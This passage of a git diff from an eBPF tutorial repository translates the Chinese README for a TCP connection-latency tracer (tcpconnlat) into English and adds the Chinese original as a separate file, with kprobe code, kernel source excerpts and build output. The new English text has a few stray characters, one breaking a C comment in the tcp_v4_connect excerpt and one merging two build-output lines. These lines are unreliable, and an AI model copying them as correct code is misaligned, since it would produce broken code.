parameter represents the ID of the process to be displayed (set to 0 when displaying the kernel stack). In the function, the source of the stack (kernel or userspace) is determined based on the `pid` parameter, and then the `blazesym_symbolize()` function is called to resolve the addresses in the stack to symbol names and source code locations. Finally, the resolved results are traversed and the symbol names and source code location information are outputted. - -The `event_handler()` function is used to handle events received from the ring buffer. It takes a `data` parameter, which points to the data in the ring buffer, and a `size` parameter, which represents the size of the data. The function first converts the `data` pointer to a pointer of type `stacktrace_event`, and then checks the sizes of the kernel and userspace stacks. If the stacks are empty, it returns directly. Next, the function outputs the process name, process ID, and CPU ID information. Then it displays the stack traces of the kernel and userspace respectively. When calling the `show_stack_trace()` function, the addresses, sizes, and process ID of the kernel and userspace stacks are passed in separately. - -These two functions are part of the eBPF profiling tool, used to display and process stack trace information collected by eBPF programs, helping users understand program performance and bottlenecks. - -### Summary - -Through this introductory tutorial on eBPF, we have learned how to use eBPF programs for performance analysis. In this process, we explained in detail how to create eBPF programs, monitor process performance, and retrieve data from the ring buffer for analyzing stack traces. We also learned how to use the `perf_event_open()` function to set up performance monitoring and attach BPF programs to performance events. In this tutorial, we also demonstrated how to write eBPF programs to capture the kernel and userspace stack information of processes in order to analyze program performance bottlenecks. With this example, you can understand the powerful features of eBPF in performance analysis. - -If you want to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository or website for more examples and complete tutorials. - -The next tutorial will further explore advanced features of eBPF. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology. We hope these contents will be helpful for your learning and practice on the eBPF development journey. - -> The original link of this article: diff --git a/src/13-tcpconnlat/README.md b/src/13-tcpconnlat/README.md index e069414..491199b 100644 --- a/src/13-tcpconnlat/README.md +++ b/src/13-tcpconnlat/README.md @@ -1,50 +1,50 @@ -# eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 +# eBPF Tutorial by Example 13: Statistics of TCP Connection Delay with libbpf -eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. -本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。 +This article is the thirteenth installment of the eBPF Tutorial by Example, mainly about how to use eBPF to statistics TCP connection delay and process data in user space using libbpf. -## 背景 +## Background -在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。 +When developing backends, regardless of the programming language used, we often need to call databases such as MySQL and Redis, perform RPC remote calls, or call other RESTful APIs. The underlying implementation of these calls is usually based on the TCP protocol. This is because TCP protocol has advantages such as reliable connection, error retransmission, congestion control, etc., so TCP is more widely used in network transport layer protocols than UDP. However, TCP also has some drawbacks, such as longer connection establishment delay. Therefore, some alternative solutions have emerged, such as QUIC (Quick UDP Internet Connections). -分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。 +Analyzing TCP connection delay is very useful for network performance analysis, optimization, and troubleshooting. -## tcpconnlat 工具概述 +## Overview of tcpconnlat Tool -`tcpconnlat` 这个工具能够跟踪内核中执行活动 TCP 连接的函数(如通过 `connect()` 系统调用),并测量并显示连接延时,即从发送 SYN 到收到响应包的时间。 +The `tcpconnlat` tool can trace the functions in the kernel that perform active TCP connections (such as using the `connect()` system call), measure and display connection delay, i.e., the time from sending SYN to receiving response packets. -### TCP 连接原理 +### TCP Connection Principle -TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤: +The process of establishing a TCP connection is often referred to as the "three-way handshake". Here are the steps of the entire process: -1. 客户端向服务器发送 SYN 包:客户端通过 `connect()` 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。 -2. SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。 -3. 服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。 -4. SYN/ACK 包传送到客户端:这是另一次网络传输。 -5. 客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。 -6. ACK 包传送到服务器:这是第三次网络传输。 -7. 服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。 -8. 唤醒服务器端用户进程:被 `accept()` 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。 +1. Client sends SYN packet to the server: The client sends SYN through the `connect()` system call. This involves local system call and CPU time cost of software interrupts. +2. SYN packet is transmitted to the server: This is a network transmission that depends on network latency. +3. Server handles the SYN packet: The server kernel receives the packet through a software interrupt, then puts it into the listen queue and sends SYN/ACK response. This mainly involves CPU time cost. +4. SYN/ACK packet is transmitted to the client: This is another network transmission. +5. Client handles the SYN/ACK: The client kernel receives and handles the SYN/ACK packet, then sends ACK. This mainly involves software interrupt handling cost. +6. ACK packet is transmitted to the server: This is the third network transmission. +7. Server receives ACK: The server kernel receives and handles the ACK, then moves the corresponding connection from the listen queue to the established queue. This involves CPU time cost of a software interrupt. +8. Wake up the server-side user process: The user process blocked by the `accept()` system call is awakened, and then the established connection is taken out from the established queue. This involves CPU cost of a context switch. -完整的流程图如下所示: +The complete flowchart is shown below: ![tcpconnlat1](tcpconnlat1.png) -在客户端视角,在正常情况下一次TCP连接总的耗时也就就大约是一次网络RTT的耗时。但在某些情况下,可能会导致连接时的网络传输耗时上涨、CPU处理开销增加、甚至是连接失败。这种时候在发现延时过长之后,就可以结合其他信息进行分析。 +From the client's perspective, under normal circumstances, the total time for a TCP connection is approximately the time consumed by one network round-trip. However, in some cases, it may cause an increase in network transmission time, an increase in CPU processing overhead, or even connection failure. When a long delay is detected, it can be analyzed in conjunction with other information. -## tcpconnlat 的 eBPF 实现 +## eBPF Implementation of tcpconnlat -为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列: +To understand the process of establishing a TCP connection, we need to understand two queues used by the Linux kernel when handling TCP connections: -- 半连接队列(SYN 队列):存储那些正在进行三次握手操作的 TCP 连接,服务器收到 SYN 包后,会将该连接信息存储在此队列中。 -- 全连接队列(Accept 队列):存储已经完成三次握手,等待应用程序调用 `accept()` 函数的 TCP 连接。服务器在收到 ACK 包后,会创建一个新的连接并将其添加到此队列。 +- Listen queue (SYN queue): Stores TCP connections that are in the process of performing three-way handshake. After the server receives the SYN packet, it stores the connection information in this queue. +- Established queue (Accept queue): Stores TCP connections that have completed three-way handshake and are waiting for the application to call the `accept()` function. After the server receives the ACK packet, it creates a new connection and adds it to this queue. -理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:`tcp_v4_connect`, `tcp_v6_connect` 和 `tcp_rcv_state_process`。 +With an understanding of the purpose of these two queues, we can begin to explore the specific implementation of tcpconnlat. The implementation of tcpconnlat can be divided into two parts: kernel space and user space, which include several main trace points: `tcp_v4_connect`, `tcp_v6_connect`, and `tcp_rcv_state_process`. -这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。 +These trace points are mainly located in the TCP/IP network stack in the kernel. When executing the corresponding system call or kernel function, these trace points are activated, triggering the execution of eBPF programs. This allows us to capture and measure the entire process of establishing a TCP connection. -让我们先来看一下这些挂载点的源代码: +Let's take a look at the source code of these mounting points first: ```c SEC("kprobe/tcp_v4_connect") @@ -56,23 +56,23 @@ int BPF_KPROBE(tcp_v4_connect, struct sock *sk) SEC("kprobe/tcp_v6_connect") int BPF_KPROBE(tcp_v6_connect, struct sock *sk) { - return trace_connect(sk); + return trace_connect(sk); } SEC("kprobe/tcp_rcv_state_process") int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) { - return handle_tcp_rcv_state_process(ctx, sk); + return handle_tcp_rcv_state_process(ctx, sk); } ``` -这段代码展示了三个内核探针(kprobe)的定义。`tcp_v4_connect` 和 `tcp_v6_connect` 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 `trace_connect()` 函数,而 `tcp_rcv_state_process` 在内核处理 TCP 连接状态变化时被触发,调用 `handle_tcp_rcv_state_process()` 函数。 +This code snippet shows the definition of three kernel probes (kprobe). `tcp_v4_connect` and `tcp_v6_connect` are triggered when the corresponding IPv4 and IPv6 connections are initialized, invoking the `trace_connect()` function. On the other hand, `tcp_rcv_state_process` is triggered when the TCP connection state changes in the kernel, calling the `handle_tcp_rcv_state_process()` function. -接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。 +The following section will be divided into two parts: one part analyzes the kernel part of these mount points, where we will delve into the kernel source code to explain how these functions work in detail. The other part analyzes the user part, focusing on how eBPF programs collect data from these mount points and interact with user-space programs. -### tcp_v4_connect 函数解析 +### Analysis of tcp_v4_connect function -`tcp_v4_connect`函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过`socket`系统调用创建了一个套接字后,接着通过`connect`系统调用尝试连接到远程服务器,此时就会触发`tcp_v4_connect`函数。 +The `tcp_v4_connect` function is the main way that the Linux kernel handles TCP IPv4 connection requests. When a user-space program creates a socket through the `socket` system call and then attempts to connect to a remote server through the `connect` system call, the `tcp_v4_connect` function is triggered. ```c /* This will initiate an outgoing connection. */ @@ -122,7 +122,6 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) ip_rt_put(rt); return -ENETUNREACH; } - if (!inet_opt || !inet_opt->opt.srr) daddr = fl4->daddr; @@ -205,38 +204,37 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) return 0; failure: - /* - * This unhashes the socket and releases the local port, - * if necessary. - */ - tcp_set_state(sk, TCP_CLOSE); - inet_bhash2_reset_saddr(sk); - ip_rt_put(rt); - sk->sk_route_caps = 0; - inet->inet_dport = 0; - return err; + /*".* This unhashes the socket and releases the local port, + * if necessary. + */ + tcp_set_state(sk, TCP_CLOSE); + inet_bhash2_reset_saddr(sk); + ip_rt_put(rt); + sk->sk_route_caps = 0; + inet->inet_dport = 0; + return err; } EXPORT_SYMBOL(tcp_v4_connect); ``` -参考链接: +Reference link: -接下来,我们一步步分析这个函数: +Next, let's analyze this function step by step: -首先,这个函数接收三个参数:一个套接字指针`sk`,一个指向套接字地址结构的指针`uaddr`和地址的长度`addr_len`。 +First, this function takes three parameters: a socket pointer `sk`, a pointer to the socket address structure `uaddr`, and the length of the address `addr_len`. ```c int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) ``` -函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。 +The function starts by checking the parameters, making sure the address length is correct and the address family is IPv4. If these conditions are not met, the function returns an error. -接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。 +Next, the function retrieves the destination address and, if a source routing option is set (an advanced IP feature that is typically not used), it also retrieves the next hop address for the source route. ```c nexthop = daddr = usin->sin_addr.s_addr; inet_opt = rcu_dereference_protected(inet->inet_opt, - lockdep_sock_is_held(sk)); + lockdep_sock_is_held(sk)); if (inet_opt && inet_opt->opt.srr) { if (!daddr) return -EINVAL; @@ -244,23 +242,23 @@ if (inet_opt && inet_opt->opt.srr) { } ``` -然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。 +Then, using this information, the function looks for a route entry to the destination address. If a route entry cannot be found or the route entry points to a multicast or broadcast address, the function returns an error. -接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为`SYN-SENT`。 +Next, it updates the source address, handles the state of some TCP timestamp options, and sets the destination port and address. After that, it updates some other socket and TCP options and sets the connection state to `SYN-SENT`. -然后,这个函数使用`inet_hash_connect`函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。 +Then, the function tries to add the socket to the connected sockets hash table using the `inet_hash_connect` function. If this step fails, it restores the socket state and returns an error. -如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。 +If all the previous steps succeed, it then updates the route entry with the new source and destination ports. If this step fails, it cleans up resources and returns an error. -接下来,它提交目标信息到套接字,并为之后的分段偏移选择一个安全的随机值。 +Next, it commits the destination information to the socket and selects a secure random value for the sequence offset for future segments. -然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。 +Then, the function tries to establish the connection using TCP Fast Open (TFO), and if TFO is not available or the TFO attempt fails, it falls back to the regular TCP three-way handshake for connection. -最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。 +Finally, if all the above steps succeed, the function returns success; otherwise, it cleans up all resources and returns an error. -总的来说,`tcp_v4_connect`函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。 +In summary, the `tcp_v4_connect` function is a complex function that handles TCP connection requests. It handles many cases, including parameter checking, route lookup, source address selection, source routing, TCP option handling, TCP Fast Open, and more. Its main goal is to establish TCP connections as safely and efficiently as possible. -### 内核态代码 +### Kernel Code ```c // SPDX-License-Identifier: GPL-2.0 @@ -396,9 +394,9 @@ int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk) char LICENSE[] SEC("license") = "GPL"; ``` -这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(`connect`系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。 +This eBPF (Extended Berkeley Packet Filter) program is mainly used to monitor and collect the time it takes to establish TCP connections, i.e., the time interval from initiating a TCP connection request (connect system call) to the completion of the connection establishment (SYN-ACK handshake process). This is very useful for monitoring network latency, service performance analysis, and other aspects. -首先,定义了两个eBPF maps:`start`和`events`。`start`是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而`events`是一个`PERF_EVENT_ARRAY`类型的map,用于将事件数据传输到用户态。 +First, two eBPF maps are defined: `start` and `events`. `start` is a hash table used to store the process information and timestamp of the initiating connection request, while `events` is a map of type `PERF_EVENT_ARRAY` used to transfer event data to user space. ```c struct { @@ -415,7 +413,7 @@ struct { } events SEC(".maps"); ``` -在`tcp_v4_connect`和`tcp_v6_connect`的kprobe处理函数`trace_connect`中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到`start`这个map中。 +In the kprobe handling functions `trace_connect` of `tcp_v4_connect` and `tcp_v6_connect`, the process information (process name, process ID, and current timestamp) of the initiating connection request is recorded and stored in the `start` map with the socket structure as the key. ```c static int trace_connect(struct sock *sk) @@ -434,7 +432,7 @@ static int trace_connect(struct sock *sk) } ``` -当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发`tcp_rcv_state_process`的kprobe处理函数`handle_tcp_rcv_state_process`。在这个函数中,首先检查socket的状态是否为`SYN-SENT`,如果是,会从`start`这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过`bpf_perf_event_output`函数发送到用户态。 +When the TCP state machine processes the SYN-ACK packet, i.e., when the connection is established, the kprobe handling function `handle_tcp_rcv_state_process` of `tcp_rcv_state_process` is triggered. In this function, it first checks if the socket state is `SYN-SENT`. If it is, it looks up the process information for the socket in the `start` map. Then it calculates the time interval from the initiation of the connection to the present and sends this time interval, process information, and TCP connection details (source port, destination port, source IP, destination IP, etc.) as an event to user space using the `bpf_perf_event_output` function. ```c static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) @@ -458,9 +456,7 @@ static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) event.delta_us = delta / 1000U; if (targ_min_us && event.delta_us < targ_min_us) - goto - - cleanup; + goto cleanup; __builtin_memcpy(&event.comm, piddatap->comm, sizeof(event.comm)); event.ts_us = ts / 1000; @@ -486,36 +482,9 @@ cleanup: } ``` -理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用`tcp_v4_connect`或`tcp_v6_connect`函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过`tcp_rcv_state_process`函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。 +This program uses a while loop to repeatedly poll the perf event buffer. If there is an error during polling (e.g., due to a signal interruption), an error message will be printed. This polling process continues until an exit flag `exiting` is received. -一些关键概念说明: - -- kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。 -- map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。 -- socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的`struct sock`结构就是对socket的实现。 - -### 用户态数据处理 - -用户态数据处理是使用`perf_buffer__poll`来接收并处理从内核发送到用户态的eBPF事件。`perf_buffer__poll`是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。 - -首先,让我们详细看一下主轮询循环: - -```c - /* main: poll */ - while (!exiting) { - err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); - if (err < 0 && err != -EINTR) { - fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err)); - goto cleanup; - } - /* reset err to return 0 if exiting */ - err = 0; - } -``` - -这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(例如由于信号中断),会打印出错误消息。这个轮询过程会一直持续,直到收到一个退出标志`exiting`。 - -接下来,让我们来看看`handle_event`函数,这个函数将处理从内核发送到用户态的每一个eBPF事件: +Next, let's take a look at the `handle_event` function, which handles every eBPF event sent from the kernel to user space: ```c void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { @@ -559,19 +528,18 @@ void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { } ``` -`handle_event`函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个`event`结构体,包含了之前在内核态计算得到的TCP连接的信息。 +The `handle_event` function takes arguments including the CPU number, a pointer to the data, and the size of the data. The data is a `event` structure that contains information about TCP connections computed in the kernel space. -首先,它将接收到的事件的时间戳和起始时间戳(如果存在)进行对比,计算出事件的相对时间,并打印出来。接着,根据IP地址的类型(IPv4或IPv6),将源地址和目标地址从网络字节序转换为主机字节序。 +First, it compares the timestamp of the received event with the start timestamp (if available) to calculate the relative time of the event, and then prints it. Next, it converts the source address and destination address from network byte order to host byte order based on the IP address type (IPv4 or IPv6). -最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。 +Finally, depending on whether the user chooses to display the local port, it prints the process ID, process name, IP version, source IP address, local port (if available), destination IP address, destination port, and connection establishment time. This connection establishment time is calculated in the eBPF program running in the kernel space and sent to the user space. -## 编译运行 +## Compilation and Execution ```console $ make ... - BPF .output/tcpconnlat.bpf.o - GEN-SKEL .output/tcpconnlat.skel.h + BPF .output/tcpconnlat.bpf.o".GEN-SKEL .output/tcpconnlat.skel.h CC .output/tcpconnlat.o BINARY tcpconnlat $ sudo ./tcpconnlat @@ -582,18 +550,22 @@ PID COMM IP SADDR DADDR DPORT LAT(ms) 222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31 ``` -源代码: 关于如何安装依赖,请参考: +Source code: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat) -参考资料: +References: -- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) +- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) in bcc -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。 +In this eBPF introductory tutorial, we learned how to use eBPF to track and measure the latency of TCP connections. We first explored how eBPF programs can attach to specific kernel functions in kernel-space and capture the start and end times of connection establishment to calculate latency. -我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。 +We also learned how to use BPF maps to store and retrieve data in kernel-space, enabling data sharing among different parts of the eBPF program. Additionally, we discussed how to use perf events to send data from kernel-space to user-space for further processing and display. -在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。 +In user-space, we introduced the usage of libbpf library APIs, such as perf_buffer__poll, to receive and process data sent from the kernel-space. We also demonstrated how to parse and print this data in a human-readable format. -如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you are interested in learning more about eBPF and its practical applications, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). You can also visit our tutorial code repository at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) for more examples and complete tutorials. + +In the upcoming tutorials, we will dive deeper into advanced features of eBPF, such as tracing the path of network packets and fine-grained system performance monitoring. We will continue to share more content on eBPF development practices to help you better understand and master eBPF technology. We hope these resources will be valuable in your learning and practical journey with eBPF. + +> The original link of this article: diff --git a/src/13-tcpconnlat/README.zh.md b/src/13-tcpconnlat/README.zh.md new file mode 100644 index 0000000..e069414 --- /dev/null +++ b/src/13-tcpconnlat/README.zh.md @@ -0,0 +1,599 @@ +# eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 + +eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 + +本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。 + +## 背景 + +在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。 + +分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。 + +## tcpconnlat 工具概述 + +`tcpconnlat` 这个工具能够跟踪内核中执行活动 TCP 连接的函数(如通过 `connect()` 系统调用),并测量并显示连接延时,即从发送 SYN 到收到响应包的时间。 + +### TCP 连接原理 + +TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤: + +1. 客户端向服务器发送 SYN 包:客户端通过 `connect()` 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。 +2. SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。 +3. 服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。 +4. SYN/ACK 包传送到客户端:这是另一次网络传输。 +5. 客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。 +6. ACK 包传送到服务器:这是第三次网络传输。 +7. 服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。 +8. 唤醒服务器端用户进程:被 `accept()` 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。 + +完整的流程图如下所示: + +![tcpconnlat1](tcpconnlat1.png) + +在客户端视角,在正常情况下一次TCP连接总的耗时也就就大约是一次网络RTT的耗时。但在某些情况下,可能会导致连接时的网络传输耗时上涨、CPU处理开销增加、甚至是连接失败。这种时候在发现延时过长之后,就可以结合其他信息进行分析。 + +## tcpconnlat 的 eBPF 实现 + +为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列: + +- 半连接队列(SYN 队列):存储那些正在进行三次握手操作的 TCP 连接,服务器收到 SYN 包后,会将该连接信息存储在此队列中。 +- 全连接队列(Accept 队列):存储已经完成三次握手,等待应用程序调用 `accept()` 函数的 TCP 连接。服务器在收到 ACK 包后,会创建一个新的连接并将其添加到此队列。 + +理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:`tcp_v4_connect`, `tcp_v6_connect` 和 `tcp_rcv_state_process`。 + +这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。 + +让我们先来看一下这些挂载点的源代码: + +```c +SEC("kprobe/tcp_v4_connect") +int BPF_KPROBE(tcp_v4_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_v6_connect") +int BPF_KPROBE(tcp_v6_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_rcv_state_process") +int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) +{ + return handle_tcp_rcv_state_process(ctx, sk); +} +``` + +这段代码展示了三个内核探针(kprobe)的定义。`tcp_v4_connect` 和 `tcp_v6_connect` 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 `trace_connect()` 函数,而 `tcp_rcv_state_process` 在内核处理 TCP 连接状态变化时被触发,调用 `handle_tcp_rcv_state_process()` 函数。 + +接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。 + +### tcp_v4_connect 函数解析 + +`tcp_v4_connect`函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过`socket`系统调用创建了一个套接字后,接着通过`connect`系统调用尝试连接到远程服务器,此时就会触发`tcp_v4_connect`函数。 + +```c +/* This will initiate an outgoing connection. */ +int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) +{ + struct sockaddr_in *usin = (struct sockaddr_in *)uaddr; + struct inet_timewait_death_row *tcp_death_row; + struct inet_sock *inet = inet_sk(sk); + struct tcp_sock *tp = tcp_sk(sk); + struct ip_options_rcu *inet_opt; + struct net *net = sock_net(sk); + __be16 orig_sport, orig_dport; + __be32 daddr, nexthop; + struct flowi4 *fl4; + struct rtable *rt; + int err; + + if (addr_len < sizeof(struct sockaddr_in)) + return -EINVAL; + + if (usin->sin_family != AF_INET) + return -EAFNOSUPPORT; + + nexthop = daddr = usin->sin_addr.s_addr; + inet_opt = rcu_dereference_protected(inet->inet_opt, + lockdep_sock_is_held(sk)); + if (inet_opt && inet_opt->opt.srr) { + if (!daddr) + return -EINVAL; + nexthop = inet_opt->opt.faddr; + } + + orig_sport = inet->inet_sport; + orig_dport = usin->sin_port; + fl4 = &inet->cork.fl.u.ip4; + rt = ip_route_connect(fl4, nexthop, inet->inet_saddr, + sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport, + orig_dport, sk); + if (IS_ERR(rt)) { + err = PTR_ERR(rt); + if (err == -ENETUNREACH) + IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES); + return err; + } + + if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) { + ip_rt_put(rt); + return -ENETUNREACH; + } + + if (!inet_opt || !inet_opt->opt.srr) + daddr = fl4->daddr; + + tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row; + + if (!inet->inet_saddr) { + err = inet_bhash2_update_saddr(sk, &fl4->saddr, AF_INET); + if (err) { + ip_rt_put(rt); + return err; + } + } else { + sk_rcv_saddr_set(sk, inet->inet_saddr); + } + + 